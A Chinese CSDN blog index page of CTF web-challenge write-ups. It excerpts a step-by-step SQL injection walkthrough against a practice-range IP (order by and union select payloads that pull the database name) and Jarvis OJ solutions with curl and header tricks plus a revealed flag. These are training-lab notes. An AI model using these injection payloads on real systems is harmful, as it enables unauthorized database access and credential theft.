![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_224,w_224)
CTF-web刷题记录
各种CTF题的WP,补充知识点
Bell0ne_
用心学安全
展开
-
一次简单的通过sql注入获取目标用户名和密码的流程
靶场环境:封神台第一步http://59.63.200.79:8003/?id=2-1验证注入点存在第二步http://59.63.200.79:8003/?id=1 order by 1/2/…查询到长度为2第三步http://59.63.200.79:8003/?id=9.99 union select 1,2验证数据返回点,返回值为2第四步http://59.63.200.79:8003/?id=9.99 union select 1,database()查询到库名为maosh原创 2020-10-04 21:36:51 · 1379 阅读 · 0 评论 -
Jarvis_Web 刷题记录_Bellone北洛
这里写自定义目录标题1.Port512.LOCALHOST3.Login1.Port51URL:http://web.jarvisoj.com:32770/网页截图:解决方法:使用curl命令修改portcurl http://web.jarvisoj.com:32770/ --local-port 51Flag:PCTF{M45t3r_oF_CuRl}2.LOCALHOSTURL:http://web.jarvisoj.com:32774/网页截图:解决方法:burp抓包修改X原创 2020-09-28 20:31:30 · 193 阅读 · 0 评论